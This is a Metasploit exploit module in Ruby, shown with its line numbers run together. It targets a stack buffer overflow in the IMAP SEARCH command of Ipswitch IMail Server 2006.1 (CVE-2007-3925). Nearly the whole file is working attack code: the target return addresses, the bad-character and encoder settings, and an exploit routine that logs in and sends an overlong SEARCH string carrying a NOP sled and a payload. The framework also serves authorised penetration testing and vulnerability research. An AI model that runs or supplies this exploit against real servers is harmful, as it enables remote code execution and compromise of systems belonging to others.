Path: blob/master/modules/exploits/windows/imap/ipswitch_search.rb
19812 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = AverageRanking78include Msf::Exploit::Remote::Imap910def initialize(info = {})11super(12update_info(13info,14'Name' => 'Ipswitch IMail IMAP SEARCH Buffer Overflow',15'Description' => %q{16This module exploits a stack buffer overflow in Ipswitch IMail Server 2006.1 IMAP SEARCH17verb. By sending an overly long string, an attacker can overwrite the18buffer and control program execution.19In order for this module to be successful, the IMAP user must have at least one20message.21},22'Author' => [ 'MC' ],23'License' => MSF_LICENSE,24'References' => [25[ 'CVE', '2007-3925' ],26[ 'OSVDB', '36219' ],27[ 'BID', '24962' ],28],29'Privileged' => true,30'DefaultOptions' => {31'EXITFUNC' => 'thread',32},33'Payload' => {34'Space' => 400,35'BadChars' => "\x00\x0a\x0d\x20\x0b\x09\x0c",36'PrependEncoder' => "\x81\xc4\xff\xef\xff\xff\x44",37},38'Platform' => 'win',39'Targets' => [40[ 'Windows 2000 Pro SP4 English', { 'Ret' => 0x77f81be3 } ],41[ 'Windows 2003 SP0 English', { 'Ret' => 0x77c5cee8 } ]42],43'DefaultTarget' => 0,44'DisclosureDate' => '2007-07-18',45'Notes' => {46'Reliability' => UNKNOWN_RELIABILITY,47'Stability' => UNKNOWN_STABILITY,48'SideEffects' => UNKNOWN_SIDE_EFFECTS49}50)51)52end5354def exploit55sploit = "a002 SEARCH BEFORE " + "<" + rand_text_english(87)56sploit << [target.ret].pack('V') + make_nops(20) + payload.encoded + ">"5758info = connect_login5960if (info == true)61print_status("Trying target #{target.name}...")62sock.put("a001 SELECT INBOX\r\n")63sock.get_once(-1, 3)64sock.put(sploit + "\r\n")65else66print_status("Not falling through with exploit")67end6869handler70disconnect71end72end737475